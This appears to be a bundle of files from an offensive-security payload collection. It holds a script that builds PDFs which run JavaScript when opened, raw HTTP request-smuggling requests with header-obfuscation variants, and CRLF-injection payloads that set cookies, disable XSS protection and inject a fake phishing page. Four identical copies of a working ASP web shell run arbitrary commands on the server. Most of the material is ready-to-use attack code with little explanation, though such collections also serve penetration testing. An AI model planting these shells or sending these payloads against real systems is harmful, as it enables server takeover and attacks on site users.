/Upload Insecure Files/Extension PDF JS/poc.py:
--------------------------------------------------------------------------------
  1 | # FROM https://github.com/osnr/horrifying-pdf-experiments
  2 | import sys
  3 | 
  4 | from pdfrw import PdfWriter
  5 | from pdfrw.objects.pdfname import PdfName
  6 | from pdfrw.objects.pdfstring import PdfString
  7 | from pdfrw.objects.pdfdict import PdfDict
  8 | from pdfrw.objects.pdfarray import PdfArray
  9 | 
 10 | def make_js_action(js):
 11 |     action = PdfDict()
 12 |     action.S = PdfName.JavaScript
 13 |     action.JS = js
 14 |     return action
 15 | 
 16 | def make_field(name, x, y, width, height, r, g, b, value=""):
 17 |     annot = PdfDict()
 18 |     annot.Type = PdfName.Annot
 19 |     annot.Subtype = PdfName.Widget
 20 |     annot.FT = PdfName.Tx
 21 |     annot.Ff = 2
 22 |     annot.Rect = PdfArray([x, y, x + width, y + height])
 23 |     annot.MaxLen = 160
 24 |     annot.T = PdfString.encode(name)
 25 |     annot.V = PdfString.encode(value)
 26 | 
 27 |     # Default appearance stream: can be arbitrary PDF XObject or
 28 |     # something. Very general.
 29 |     annot.AP = PdfDict()
 30 | 
 31 |     ap = annot.AP.N = PdfDict()
 32 |     ap.Type = PdfName.XObject
 33 |     ap.Subtype = PdfName.Form
 34 |     ap.FormType = 1
 35 |     ap.BBox = PdfArray([0, 0, width, height])
 36 |     ap.Matrix = PdfArray([1.0, 0.0, 0.0, 1.0, 0.0, 0.0])
 37 |     ap.stream = """
 38 | %f %f %f rg
 39 | 0.0 0.0 %f %f re f
 40 | """ % (r, g, b, width, height)
 41 | 
 42 |     # It took me a while to figure this out. See PDF spec:
 43 |     # https://www.adobe.com/content/dam/Adobe/en/devnet/acrobat/pdfs/pdf_reference_1-7.pdf#page=641
 44 | 
 45 |     # Basically, the appearance stream we just specified doesn't
 46 |     # follow the field rect if it gets changed in JS (at least not in
 47 |     # Chrome).
 48 | 
 49 |     # But this simple MK field here, with border/color
 50 |     # characteristics, _does_ follow those movements and resizes, so
 51 |     # we can get moving colored rectangles this way.
 52 |     annot.MK = PdfDict()
 53 |     annot.MK.BG = PdfArray([r, g, b])
 54 | 
 55 |     return annot
 56 | 
 57 | def make_page(fields, script):
 58 |     page = PdfDict()
 59 |     page.Type = PdfName.Page
 60 | 
 61 |     page.Resources = PdfDict()
 62 |     page.Resources.Font = PdfDict()
 63 |     page.Resources.Font.F1 = PdfDict()
 64 |     page.Resources.Font.F1.Type = PdfName.Font
 65 |     page.Resources.Font.F1.Subtype = PdfName.Type1
 66 |     page.Resources.Font.F1.BaseFont = PdfName.Helvetica
 67 | 
 68 |     page.MediaBox = PdfArray([0, 0, 612, 792])
 69 | 
 70 |     page.Contents = PdfDict()
 71 |     page.Contents.stream = """
 72 | BT
 73 | /F1 24 Tf
 74 | ET
 75 |     """
 76 | 
 77 |     annots = fields
 78 | 
 79 |     page.AA = PdfDict()
 80 |     # You probably should just wrap each JS action with a try/catch,
 81 |     # because Chrome does no error reporting or even logging otherwise;
 82 |     # you just get a silent failure.
 83 |     page.AA.O = make_js_action("""
 84 | try {
 85 |   %s
 86 | } catch (e) {
 87 |   app.alert(e.message);
 88 | }
 89 |     """ % (script))
 90 | 
 91 |     page.Annots = PdfArray(annots)
 92 |     return page
 93 | 
 94 | if len(sys.argv) > 1:
 95 |     js_file = open(sys.argv[1], 'r')
 96 | 
 97 |     fields = []
 98 |     for line in js_file:
 99 |         if not line.startswith('/// '): break
100 |         pieces = line.split()
101 |         params = [pieces[1]] + [float(token) for token in pieces[2:]]
102 |         fields.append(make_field(*params))
103 | 
104 |     js_file.seek(0)
105 | 
106 |     out = PdfWriter()
107 |     out.addpage(make_page(fields, js_file.read()))
108 |     out.write('result.pdf')


--------------------------------------------------------------------------------
/Request Smuggling/README.md:
--------------------------------------------------------------------------------
  1 | # Request Smuggling
  2 | 
  3 | ## Summary
  4 | 
  5 | * [Tools](#tools)
  6 | * [CL.TE vulnerabilities](#cl.te-vulnerabilities)
  7 | * [TE.CL vulnerabilities](#te.cl-vulnerabilities)
  8 | * [TE.TE behavior: obfuscating the TE header](#te.te-behavior-obfuscating-the-te-header)
  9 | * [References](#references)
 10 | 
 11 | ## Tools
 12 | 
 13 | * [HTTP Request Smuggler / BApp Store](https://portswigger.net/bappstore/aaaa60ef945341e8a450217a54a11646)
 14 | * [Smuggler](https://github.com/defparam/smuggler)
 15 | 
 16 | ## CL.TE vulnerabilities
 17 | 
 18 | > The front-end server uses the Content-Length header and the back-end server uses the Transfer-Encoding header.
 19 | 
 20 | ```powershell
 21 | POST / HTTP/1.1
 22 | Host: vulnerable-website.com
 23 | Content-Length: 13
 24 | Transfer-Encoding: chunked
 25 | 
 26 | 0
 27 | 
 28 | SMUGGLED
 29 | ```
 30 | 
 31 | Example:
 32 | 
 33 | ```powershell
 34 | POST / HTTP/1.1
 35 | Host: domain.example.com
 36 | Connection: keep-alive
 37 | Content-Type: application/x-www-form-urlencoded
 38 | Content-Length: 6
 39 | Transfer-Encoding: chunked
 40 | 
 41 | 0
 42 | 
 43 | G
 44 | ```
 45 | 
 46 | Challenge: https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te
 47 | 
 48 | ## TE.CL vulnerabilities
 49 | 
 50 | > The front-end server uses the Transfer-Encoding header and the back-end server uses the Content-Length header. 
 51 | 
 52 | ```powershell
 53 | POST / HTTP/1.1
 54 | Host: vulnerable-website.com
 55 | Content-Length: 3
 56 | Transfer-Encoding: chunked
 57 | 
 58 | 8
 59 | SMUGGLED
 60 | 0
 61 | ```
 62 | 
 63 | Example:
 64 | 
 65 | ```powershell
 66 | POST / HTTP/1.1
 67 | Host: domain.example.com
 68 | User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86
 69 | Content-Length: 4
 70 | Connection: close
 71 | Content-Type: application/x-www-form-urlencoded
 72 | Accept-Encoding: gzip, deflate
 73 | 
 74 | 5c
 75 | GPOST / HTTP/1.1
 76 | Content-Type: application/x-www-form-urlencoded
 77 | Content-Length: 15
 78 | x=1
 79 | 0
 80 | 
 81 | 
 82 | ```
 83 | 
 84 | :warning: To send this request using Burp Repeater, you will first need to go to the Repeater menu and ensure that the "Update Content-Length" option is unchecked.You need to include the trailing sequence \r\n\r\n following the final 0.
 85 | 
 86 | Challenge: https://portswigger.net/web-security/request-smuggling/lab-basic-te-cl
 87 | 
 88 | ## TE.TE behavior: obfuscating the TE header
 89 | 
 90 | > The front-end and back-end servers both support the Transfer-Encoding header, but one of the servers can be induced not to process it by obfuscating the header in some way.
 91 | 
 92 | ```powershell
 93 | Transfer-Encoding: xchunked
 94 | Transfer-Encoding : chunked
 95 | Transfer-Encoding: chunked
 96 | Transfer-Encoding: x
 97 | Transfer-Encoding:[tab]chunked
 98 | [space]Transfer-Encoding: chunked
 99 | X: X[\n]Transfer-Encoding: chunked
100 | Transfer-Encoding
101 | : chunked
102 | ```
103 | 
104 | Challenge: https://portswigger.net/web-security/request-smuggling/lab-ofuscating-te-header
105 | 
106 | ## References
107 | 
108 | * [PortSwigger - Request Smuggling Tutorial](https://portswigger.net/web-security/request-smuggling) and [PortSwigger - Request Smuggling Reborn](https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn)
109 | * [A Pentester's Guide to HTTP Request Smuggling - Busra Demir - 2020, October 16](https://blog.cobalt.io/a-pentesters-guide-to-http-request-smuggling-8b7bf0db1f0)
110 | 


--------------------------------------------------------------------------------
/CRLF Injection/README.md:
--------------------------------------------------------------------------------
  1 | # CRLF
  2 | 
  3 | >The term CRLF refers to Carriage Return (ASCII 13, \r) Line Feed (ASCII 10, \n). They're used to note the termination of a line, however, dealt with differently in today’s popular Operating Systems. For example: in Windows both a CR and LF are required to note the end of a line, whereas in Linux/UNIX a LF is only required. In the HTTP protocol, the CR-LF sequence is always used to terminate a line.
  4 | 
  5 | >A CRLF Injection attack occurs when a user manages to submit a CRLF into an application. This is most commonly done by modifying an HTTP parameter or URL.
  6 | 
  7 | ## Summary
  8 | 
  9 | - [CRLF - Add a cookie](#crlf---add-a-cookie)
 10 | - [CRLF - Add a cookie - XSS Bypass](#crlf---add-a-cookie---xss-bypass)
 11 | - [CRLF - Write HTML](#crlf---write-html)
 12 | - [CRLF - Filter Bypass](#crlf---filter-bypass)
 13 | - [References](#references)
 14 | 
 15 | ## CRLF - Add a cookie
 16 | 
 17 | Requested page
 18 | 
 19 | ```http
 20 | http://www.example.net/%0D%0ASet-Cookie:mycookie=myvalue
 21 | ```
 22 | 
 23 | HTTP Response
 24 | 
 25 | ```http
 26 | Connection: keep-alive
 27 | Content-Length: 178
 28 | Content-Type: text/html
 29 | Date: Mon, 09 May 2016 14:47:29 GMT
 30 | Location: https://www.example.net/[INJECTION STARTS HERE]
 31 | Set-Cookie: mycookie=myvalue
 32 | X-Frame-Options: SAMEORIGIN
 33 | X-Sucuri-ID: 15016
 34 | x-content-type-options: nosniff
 35 | x-xss-protection: 1; mode=block
 36 | ```
 37 | 
 38 | ## CRLF - Add a cookie - XSS Bypass
 39 | 
 40 | Requested page
 41 | 
 42 | ```powershell
 43 | http://example.com/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2f%2e%2e
 44 | ```
 45 | 
 46 | HTTP Response
 47 | 
 48 | ```http
 49 | HTTP/1.1 200 OK
 50 | Date: Tue, 20 Dec 2016 14:34:03 GMT
 51 | Content-Type: text/html; charset=utf-8
 52 | Content-Length: 22907
 53 | Connection: close
 54 | X-Frame-Options: SAMEORIGIN
 55 | Last-Modified: Tue, 20 Dec 2016 11:50:50 GMT
 56 | ETag: "842fe-597b-54415a5c97a80"
 57 | Vary: Accept-Encoding
 58 | X-UA-Compatible: IE=edge
 59 | Server: NetDNA-cache/2.2
 60 | Link: <https://example.com/[INJECTION STARTS HERE]
 61 | Content-Length:35
 62 | X-XSS-Protection:0
 63 | 
 64 | 23
 65 | <svg onload=alert(document.domain)>
 66 | 0
 67 | ```
 68 | 
 69 | ## CRLF - Write HTML
 70 | 
 71 | Requested page
 72 | 
 73 | ```http
 74 | http://www.example.net/index.php?lang=en%0D%0AContent-Length%3A%200%0A%20%0AHTTP/1.1%20200%20OK%0AContent-Type%3A%20text/html%0ALast-Modified%3A%20Mon%2C%2027%20Oct%202060%2014%3A50%3A18%20GMT%0AContent-Length%3A%2034%0A%20%0A%3Chtml%3EYou%20have%20been%20Phished%3C/html%3E
 75 | ```
 76 | 
 77 | HTTP response
 78 | 
 79 | ```http
 80 | Set-Cookie:en
 81 | Content-Length: 0
 82 | 
 83 | HTTP/1.1 200 OK
 84 | Content-Type: text/html
 85 | Last-Modified: Mon, 27 Oct 2060 14:50:18 GMT
 86 | Content-Length: 34
 87 | 
 88 | <html>You have been Phished</html>
 89 | ```
 90 | 
 91 | ## CRLF - Filter Bypass
 92 | 
 93 | Using UTF-8 encoding
 94 | 
 95 | ```http
 96 | %E5%98%8A%E5%98%8Dcontent-type:text/html%E5%98%8A%E5%98%8Dlocation:%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%BCsvg/onload=alert%28innerHTML%28%29%E5%98%BE
 97 | ```
 98 | 
 99 | Remainder:
100 | 
101 | * %E5%98%8A = %0A = \u560a
102 | * %E5%98%8D = %0D = \u560d
103 | * %E5%98%BE = %3E = \u563e (>)
104 | * %E5%98%BC = %3C = \u563c (<)
105 | 
106 | 
107 | ## Exploitation Tricks
108 | * Try to search for parameters that lead to redirects and fuzz them
109 | * Also test the mobile version of the website, sometimes it is different or uses a different backend 
110 | 
111 | ## References
112 | 
113 | * https://www.owasp.org/index.php/CRLF_Injection
114 | * https://vulners.com/hackerone/H1:192749
115 | 


--------------------------------------------------------------------------------
/Upload Insecure Files/Extension ASP/shell.asa:
--------------------------------------------------------------------------------
 1 | <%
 2 | ' *******************************************************************************
 3 | ' ***
 4 | ' *** Laudanum Project
 5 | ' *** A Collection of Injectable Files used during a Penetration Test
 6 | ' ***
 7 | ' *** More information is available at:
 8 | ' ***  http://laudanum.secureideas.net
 9 | ' ***  laudanum@secureideas.net
10 | ' ***
11 | ' ***  Project Leads:
12 | ' ***         Kevin Johnson <kjohnson@secureideas.net
13 | ' ***         Tim Medin <tim@securitywhole.com>
14 | ' ***
15 | ' *** Copyright 2012 by Kevin Johnson and the Laudanum Team
16 | ' ***
17 | ' ********************************************************************************
18 | ' ***
19 | ' ***   Updated and fixed by Robin Wood <Digininja>
20 | ' ***   Updated and fixed by Tim Medin <tim@securitywhole.com
21 | ' ***
22 | ' ********************************************************************************
23 | ' *** This program is free software; you can redistribute it and/or
24 | ' *** modify it under the terms of the GNU General Public License
25 | ' *** as published by the Free Software Foundation; either version 2
26 | ' *** of the License, or (at your option) any later version.
27 | ' ***
28 | ' *** This program is distributed in the hope that it will be useful,
29 | ' *** but WITHOUT ANY WARRANTY; without even the implied warranty of
30 | ' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
31 | ' *** GNU General Public License for more details.
32 | ' ***
33 | ' *** You can get a copy of the GNU General Public License from this
34 | ' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1
35 | ' *** You can also write to the Free Software Foundation, Inc., Temple
36 | ' *** Place - Suite  Boston, MA   USA.
37 | ' ***
38 | ' ***************************************************************************** */
39 | 
40 | 
41 | ' can set this to 0 for never time out but don't want to kill the server if a script
42 | ' goes into a loop for any reason
43 | Server.ScriptTimeout = 180
44 | 
45 | ip=request.ServerVariables("REMOTE_ADDR")
46 | if ip<>"1.2.3.4" then
47 |  response.Status="404 Page Not Found"
48 |  response.Write(response.Status)
49 |  response.End
50 | end if
51 | 
52 | if Request.Form("submit") <> "" then
53 |    Dim wshell, intReturn, strPResult
54 |    cmd = Request.Form("cmd")
55 |    Response.Write ("Running command: " & cmd & "<br />")
56 |    set wshell = CreateObject("WScript.Shell")
57 |    Set objCmd = wShell.Exec(cmd)
58 |    strPResult = objCmd.StdOut.Readall()
59 | 
60 |    response.write "<br><pre>" & replace(replace(strPResult,"<","&lt;"),vbCrLf,"<br>") & "</pre>"
61 | 
62 |    set wshell = nothing
63 | end if
64 | 
65 | %>
66 | <html>
67 | <head><title>Laundanum ASP Shell</title></head>
68 | <body onload="document.shell.cmd.focus()">
69 | <form action="shell.asp" method="POST" name="shell">
70 | Command: <Input width="200" type="text" name="cmd" value="<%=cmd%>" /><br />
71 | <input type="submit" name="submit" value="Submit" />
72 | <p>Don't forget that if you want to shell command (not a specific executable) you need to call cmd.exe. It is usually located at C:\Windows\System32\cmd.exe, but to be safe just call %ComSpec%. Also, don't forget to use the /c switch so cmd.exe terminates when your command is done.
73 | <p>Example command to do a directory listing:<br>
74 | %ComSpec% /c dir
75 | </form>
76 | <hr/>
77 | <address>
78 | Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
79 | Written by Tim Medin.<br/>
80 | Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
81 | </address>
82 | </body>
83 | </html>


--------------------------------------------------------------------------------
/Upload Insecure Files/Extension ASP/shell.asp:
--------------------------------------------------------------------------------
 1 | <%
 2 | ' *******************************************************************************
 3 | ' ***
 4 | ' *** Laudanum Project
 5 | ' *** A Collection of Injectable Files used during a Penetration Test
 6 | ' ***
 7 | ' *** More information is available at:
 8 | ' ***  http://laudanum.secureideas.net
 9 | ' ***  laudanum@secureideas.net
10 | ' ***
11 | ' ***  Project Leads:
12 | ' ***         Kevin Johnson <kjohnson@secureideas.net
13 | ' ***         Tim Medin <tim@securitywhole.com>
14 | ' ***
15 | ' *** Copyright 2012 by Kevin Johnson and the Laudanum Team
16 | ' ***
17 | ' ********************************************************************************
18 | ' ***
19 | ' ***   Updated and fixed by Robin Wood <Digininja>
20 | ' ***   Updated and fixed by Tim Medin <tim@securitywhole.com
21 | ' ***
22 | ' ********************************************************************************
23 | ' *** This program is free software; you can redistribute it and/or
24 | ' *** modify it under the terms of the GNU General Public License
25 | ' *** as published by the Free Software Foundation; either version 2
26 | ' *** of the License, or (at your option) any later version.
27 | ' ***
28 | ' *** This program is distributed in the hope that it will be useful,
29 | ' *** but WITHOUT ANY WARRANTY; without even the implied warranty of
30 | ' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
31 | ' *** GNU General Public License for more details.
32 | ' ***
33 | ' *** You can get a copy of the GNU General Public License from this
34 | ' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1
35 | ' *** You can also write to the Free Software Foundation, Inc., Temple
36 | ' *** Place - Suite  Boston, MA   USA.
37 | ' ***
38 | ' ***************************************************************************** */
39 | 
40 | 
41 | ' can set this to 0 for never time out but don't want to kill the server if a script
42 | ' goes into a loop for any reason
43 | Server.ScriptTimeout = 180
44 | 
45 | ip=request.ServerVariables("REMOTE_ADDR")
46 | if ip<>"1.2.3.4" then
47 |  response.Status="404 Page Not Found"
48 |  response.Write(response.Status)
49 |  response.End
50 | end if
51 | 
52 | if Request.Form("submit") <> "" then
53 |    Dim wshell, intReturn, strPResult
54 |    cmd = Request.Form("cmd")
55 |    Response.Write ("Running command: " & cmd & "<br />")
56 |    set wshell = CreateObject("WScript.Shell")
57 |    Set objCmd = wShell.Exec(cmd)
58 |    strPResult = objCmd.StdOut.Readall()
59 | 
60 |    response.write "<br><pre>" & replace(replace(strPResult,"<","&lt;"),vbCrLf,"<br>") & "</pre>"
61 | 
62 |    set wshell = nothing
63 | end if
64 | 
65 | %>
66 | <html>
67 | <head><title>Laundanum ASP Shell</title></head>
68 | <body onload="document.shell.cmd.focus()">
69 | <form action="shell.asp" method="POST" name="shell">
70 | Command: <Input width="200" type="text" name="cmd" value="<%=cmd%>" /><br />
71 | <input type="submit" name="submit" value="Submit" />
72 | <p>Don't forget that if you want to shell command (not a specific executable) you need to call cmd.exe. It is usually located at C:\Windows\System32\cmd.exe, but to be safe just call %ComSpec%. Also, don't forget to use the /c switch so cmd.exe terminates when your command is done.
73 | <p>Example command to do a directory listing:<br>
74 | %ComSpec% /c dir
75 | </form>
76 | <hr/>
77 | <address>
78 | Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
79 | Written by Tim Medin.<br/>
80 | Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
81 | </address>
82 | </body>
83 | </html>


--------------------------------------------------------------------------------
/Upload Insecure Files/Extension ASP/shell.cer:
--------------------------------------------------------------------------------
 1 | <%
 2 | ' *******************************************************************************
 3 | ' ***
 4 | ' *** Laudanum Project
 5 | ' *** A Collection of Injectable Files used during a Penetration Test
 6 | ' ***
 7 | ' *** More information is available at:
 8 | ' ***  http://laudanum.secureideas.net
 9 | ' ***  laudanum@secureideas.net
10 | ' ***
11 | ' ***  Project Leads:
12 | ' ***         Kevin Johnson <kjohnson@secureideas.net
13 | ' ***         Tim Medin <tim@securitywhole.com>
14 | ' ***
15 | ' *** Copyright 2012 by Kevin Johnson and the Laudanum Team
16 | ' ***
17 | ' ********************************************************************************
18 | ' ***
19 | ' ***   Updated and fixed by Robin Wood <Digininja>
20 | ' ***   Updated and fixed by Tim Medin <tim@securitywhole.com
21 | ' ***
22 | ' ********************************************************************************
23 | ' *** This program is free software; you can redistribute it and/or
24 | ' *** modify it under the terms of the GNU General Public License
25 | ' *** as published by the Free Software Foundation; either version 2
26 | ' *** of the License, or (at your option) any later version.
27 | ' ***
28 | ' *** This program is distributed in the hope that it will be useful,
29 | ' *** but WITHOUT ANY WARRANTY; without even the implied warranty of
30 | ' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
31 | ' *** GNU General Public License for more details.
32 | ' ***
33 | ' *** You can get a copy of the GNU General Public License from this
34 | ' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1
35 | ' *** You can also write to the Free Software Foundation, Inc., Temple
36 | ' *** Place - Suite  Boston, MA   USA.
37 | ' ***
38 | ' ***************************************************************************** */
39 | 
40 | 
41 | ' can set this to 0 for never time out but don't want to kill the server if a script
42 | ' goes into a loop for any reason
43 | Server.ScriptTimeout = 180
44 | 
45 | ip=request.ServerVariables("REMOTE_ADDR")
46 | if ip<>"1.2.3.4" then
47 |  response.Status="404 Page Not Found"
48 |  response.Write(response.Status)
49 |  response.End
50 | end if
51 | 
52 | if Request.Form("submit") <> "" then
53 |    Dim wshell, intReturn, strPResult
54 |    cmd = Request.Form("cmd")
55 |    Response.Write ("Running command: " & cmd & "<br />")
56 |    set wshell = CreateObject("WScript.Shell")
57 |    Set objCmd = wShell.Exec(cmd)
58 |    strPResult = objCmd.StdOut.Readall()
59 | 
60 |    response.write "<br><pre>" & replace(replace(strPResult,"<","&lt;"),vbCrLf,"<br>") & "</pre>"
61 | 
62 |    set wshell = nothing
63 | end if
64 | 
65 | %>
66 | <html>
67 | <head><title>Laundanum ASP Shell</title></head>
68 | <body onload="document.shell.cmd.focus()">
69 | <form action="shell.asp" method="POST" name="shell">
70 | Command: <Input width="200" type="text" name="cmd" value="<%=cmd%>" /><br />
71 | <input type="submit" name="submit" value="Submit" />
72 | <p>Don't forget that if you want to shell command (not a specific executable) you need to call cmd.exe. It is usually located at C:\Windows\System32\cmd.exe, but to be safe just call %ComSpec%. Also, don't forget to use the /c switch so cmd.exe terminates when your command is done.
73 | <p>Example command to do a directory listing:<br>
74 | %ComSpec% /c dir
75 | </form>
76 | <hr/>
77 | <address>
78 | Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
79 | Written by Tim Medin.<br/>
80 | Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
81 | </address>
82 | </body>
83 | </html>


--------------------------------------------------------------------------------
/Upload Insecure Files/Extension ASP/shell.asmx:
--------------------------------------------------------------------------------
 1 | <%
 2 | ' *******************************************************************************
 3 | ' ***
 4 | ' *** Laudanum Project
 5 | ' *** A Collection of Injectable Files used during a Penetration Test
 6 | ' ***
 7 | ' *** More information is available at:
 8 | ' ***  http://laudanum.secureideas.net
 9 | ' ***  laudanum@secureideas.net
10 | ' ***
11 | ' ***  Project Leads:
12 | ' ***         Kevin Johnson <kjohnson@secureideas.net
13 | ' ***         Tim Medin <tim@securitywhole.com>
14 | ' ***
15 | ' *** Copyright 2012 by Kevin Johnson and the Laudanum Team
16 | ' ***
17 | ' ********************************************************************************
18 | ' ***
19 | ' ***   Updated and fixed by Robin Wood <Digininja>
20 | ' ***   Updated and fixed by Tim Medin <tim@securitywhole.com
21 | ' ***
22 | ' ********************************************************************************
23 | ' *** This program is free software; you can redistribute it and/or
24 | ' *** modify it under the terms of the GNU General Public License
25 | ' *** as published by the Free Software Foundation; either version 2
26 | ' *** of the License, or (at your option) any later version.
27 | ' ***
28 | ' *** This program is distributed in the hope that it will be useful,
29 | ' *** but WITHOUT ANY WARRANTY; without even the implied warranty of
30 | ' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
31 | ' *** GNU General Public License for more details.
32 | ' ***
33 | ' *** You can get a copy of the GNU General Public License from this
34 | ' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1
35 | ' *** You can also write to the Free Software Foundation, Inc., Temple
36 | ' *** Place - Suite  Boston, MA   USA.
37 | ' ***
38 | ' ***************************************************************************** */
39 | 
40 | 
41 | ' can set this to 0 for never time out but don't want to kill the server if a script
42 | ' goes into a loop for any reason
43 | Server.ScriptTimeout = 180
44 | 
45 | ip=request.ServerVariables("REMOTE_ADDR")
46 | if ip<>"1.2.3.4" then
47 |  response.Status="404 Page Not Found"
48 |  response.Write(response.Status)
49 |  response.End
50 | end if
51 | 
52 | if Request.Form("submit") <> "" then
53 |    Dim wshell, intReturn, strPResult
54 |    cmd = Request.Form("cmd")
55 |    Response.Write ("Running command: " & cmd & "<br />")
56 |    set wshell = CreateObject("WScript.Shell")
57 |    Set objCmd = wShell.Exec(cmd)
58 |    strPResult = objCmd.StdOut.Readall()
59 | 
60 |    response.write "<br><pre>" & replace(replace(strPResult,"<","&lt;"),vbCrLf,"<br>") & "</pre>"
61 | 
62 |    set wshell = nothing
63 | end if
64 | 
65 | %>
66 | <html>
67 | <head><title>Laundanum ASP Shell</title></head>
68 | <body onload="document.shell.cmd.focus()">
69 | <form action="shell.asp" method="POST" name="shell">
70 | Command: <Input width="200" type="text" name="cmd" value="<%=cmd%>" /><br />
71 | <input type="submit" name="submit" value="Submit" />
72 | <p>Don't forget that if you want to shell command (not a specific executable) you need to call cmd.exe. It is usually located at C:\Windows\System32\cmd.exe, but to be safe just call %ComSpec%. Also, don't forget to use the /c switch so cmd.exe terminates when your command is done.
73 | <p>Example command to do a directory listing:<br>
74 | %ComSpec% /c dir
75 | </form>
76 | <hr/>
77 | <address>
78 | Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
79 | Written by Tim Medin.<br/>
80 | Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
81 | </address>
82 | </body>
83 | </html>


--------------------------------------------------------------------------------